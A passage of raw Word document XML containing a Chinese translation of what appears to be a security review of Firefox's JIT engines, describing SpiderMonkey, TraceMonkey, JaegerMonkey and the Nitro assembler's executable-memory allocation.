      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>理器，中间表示转换层和用于将本机指令写入内存的汇编器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293FD9FB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119A467B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>根据JIT设计，也可能存在其他组件。由于其动态类型系统的性质，通常为JavaScript之类的语言实现属性缓存。跟踪JIT通常实现监视和记录字节</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码执行</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>情况的接口。方法JIT可以实现内联缓存，以在运行时重写类型查找。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668E9D6B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="083A0FAE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367838B7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_bookmark2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t xml:space="preserve">Trace / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JaegerMonkey体系结构</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D24884B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D8D677C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:t>Mozilla的前端JavaScript引擎SpiderMonkey解析JavaScript语法并生成内部中间表示字节代码。这个中间体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7C966" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F864797" w14:textId="5B561D62" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="634"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>表示被认为是受信任的，因为只有内部组件才能生成它。然后将IR馈送到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TraceMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> JIT引擎，以编译为本机代码。这些组件中的每一个都分为两个主要部分：前端，它解析脚本并生成中间字节码；后端</w:t>
      </w:r>
      <w:r w:rsidR="00EE49BB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将中间字节码转换为本地代码并执行。我们的体系结构审查已细分为分别涵盖每个引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D75374F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D7A82B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="427"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Mozilla的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">是解析ECMA / JavaScript并生成内部可信中间表示的前端组件。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>引擎提供了ECMA规范定义的所有接口。此实现需要编写许多传统上很难安全编写的代码。该代码必须从不受信任的源中解析脚本文本，然后创建并维护对象实例以在脚本的整个运行期间代表脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B44A1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48648125" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="542"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从处理器密集型JavaScript派生的字节码可能是一个缓慢的过程。为了解决此问题，Mozilla首先引入了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TraceMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>引擎，该引擎跟踪IR的执行并尝试检测可从JIT编译中受益的热代码路径。热代码路径被定义为多次执行循环的块。与其他浏览器相比，该技术非常有效，并且使Mozilla具有性能优势。随着Firefox 4的发布，Mozilla引入了另一个名为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">的JIT引擎。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是一种JIT设计方法，始终将所有JavaScript编译为未经优化的本机代码。这两个引擎相互补充，下面将详细讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB4C2C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76661324" w14:textId="1DB12081" w:rsidR="0026102A" w:rsidRDefault="00EE49BB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44F94024" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="31"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291E8CDB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="407"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>旨在将所有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">产生的IR进行JIT处理，而无需首先跟踪并记录其解释的执行情况。 </w:t>
      </w:r>
      <w:r>
        <w:t>Nitro是从WebKit项目借来的（最初是为Safari开发的），是JaegerMonkey的后端汇编程序。因为JaegerMonkey引擎会为所有SpiderMonkey IR发出代码，所以它不会尝试生成高度优化的代码。这是设计使然，因为JaegerMonkey的设计目标旨在补充优化的TraceMonkey引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140E76FE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F7A20D" w14:textId="005BF8C9" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="501"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Nitro可以为x86，x86_64和ARM处理器</w:t>
      </w:r>
      <w:r w:rsidR="00EE49BB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本机代码。由于名为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AbstractMacroAssembler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的抽象层，因此可以使用Nitro编写跨平台JIT。 Firefox利用了此功能，但是这些其他体系结构不在我们研究范围之内。我们的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>架构故障从下而上开始</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，首先回顾了Nitro汇编程序的内存管理和代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码生成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1093E7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2306F430" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="75" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="407"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nitro由两部分组成：一个部分处理代码汇编，另一部分处理本地代码的内存分配和释放。内存分配是通过在Win32系统上调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和在POSIX系统上调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来执行的。这些页面通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ExecutablePool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">类实例进行跟踪。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ExecutablePool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类包含几个成员变量，这些成员变量用于跟踪和划分更大的分配资源。这些包括Allocation ::</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>page，Allocat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ion :: size，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>m_freePtr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>m_en</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>m_refCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2A53C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1819D9CC" w14:textId="55B5E4B9" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="435"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>utablePool类通过实用</w:t>
      </w:r>
      <w:r>
        <w:t>程序方法分配更大的分配。客户端可以使用ExecutablePool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: alloc方法，该方法将请求分配的大小作为参数。这将进一步</w:t>
      </w:r>
      <w:r w:rsidR="00EE49BB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poolForSiz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>e方法，该方法首先检查任何可能能够容纳分配的</w:t>
      </w:r>
      <w:r>
        <w:t>现有</w:t>
      </w:r>
      <w:r w:rsidR="00EE49BB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>small</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE49BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE49BB">
        <w:t>pool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>如果不存在，并且请求的分配大小不大</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00EE49BB">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> * 16），</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>则会创建一个新的池</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m_freePtr和m_End类成员</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE49BB">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>标记</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>分配</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE49BB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>块</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>的开始和结束</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C52946" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CD24D1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
      </w:pPr>
      <w:r>
        <w:t>JaegerMonkey使用此接口分配原始RWX内存池。然后，使用AssemblerBuffer和LinkBuffer类将单独的代码块写入它们。这些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>基础抽象使用Executable</w:t>
      </w:r>
      <w:r>
        <w:t>Allo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>cator类根据代码块</w:t>
      </w:r>
      <w:r>
        <w:t>的大小为代码块选择最佳池。在ExecutablePool类实例被销毁之前，不会释放JIT内存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690A3D37" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DB5846" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="1300"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78BC3C96" wp14:editId="686D2F3D">
            <wp:extent cx="4521212" cy="554640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521212" cy="5546407"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D6417C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339AF389" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="93" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="439"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实际上，这种基本的分配器对攻击者不是很有吸引力。但是，了解每个JIT引擎如何对每个可执行页面进行分块和处理的知识对于理解JIT如何将中间表示形式转换为本机代码到内存至关重要。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7D9F2B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20500AA4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>字节码到本机代码的大部分转换是在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mjit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
